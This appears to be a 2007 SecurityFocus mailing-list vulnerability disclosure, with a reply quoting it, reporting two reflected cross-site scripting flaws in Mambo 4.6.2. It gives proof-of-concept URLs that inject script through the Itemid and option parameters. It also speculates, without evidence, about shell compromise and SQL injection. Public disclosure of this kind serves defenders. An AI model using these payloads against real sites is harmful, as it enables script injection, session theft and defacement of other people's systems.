Back to list
|
Post reply
Multiple xss in mambo 4.6.2
Dec 18 2007 01:25PM
beenudel1986 gmail com
(1 replies)
~~~~~~~~~~~~~~~~Application : Mambo v4.6.2~~~~~~~~~~~~~~~~
Author : Beenu Arora
website : www.darkc0de.com
Email ; beenudel1986 (at) gmail (dot) com [email concealed]
Website: http://sourceforge.net/projects/mambo/
---------------
|Multiple XSS |
---------------
a.Vulnerable URL: http://localhost/mambo/index.php?option=com_frontpage&Itemid=
Parameter = Itemid
POC =http://localhost/mambo/http://localhost/index.php?option=com_frontpage&
Itemid=>"><script>alert("XSS%20Successful")</script>
b. Vulnerable URL: http://www.localhost/index.php
Parameter = option
POC =http://localhost/index.php?option=>"><script>alert("XSS%20Successful")<
/script>&Itemid=1
some people might not get potential of xss but the attack can lead to complete compromise ( use shell)
perhaps there are two sql injection also but need to be tested . so next time:)
~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~
[ reply ]
Re: Multiple xss in mambo 4.6.2
Dec 26 2007 09:52PM
Hanno Böck (ml hboeck de)
Privacy Statement
Copyright 2010, SecurityFocus
Author : Beenu Arora
website : www.darkc0de.com
Email ; beenudel1986 (at) gmail (dot) com [email concealed]
Website: http://sourceforge.net/projects/mambo/
---------------
|Multiple XSS |
---------------
a.Vulnerable URL: http://localhost/mambo/index.php?option=com_frontpage&Itemid=
Parameter = Itemid
POC =http://localhost/mambo/http://localhost/index.php?option=com_frontpage&
Itemid=>"><script>alert("XSS%20Successful")</script>
b. Vulnerable URL: http://www.localhost/index.php
Parameter = option
POC =http://localhost/index.php?option=>"><script>alert("XSS%20Successful")<
/script>&Itemid=1
some people might not get potential of xss but the attack can lead to complete compromise ( use shell)
perhaps there are two sql injection also but need to be tested . so next time:)
~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~
[ reply ]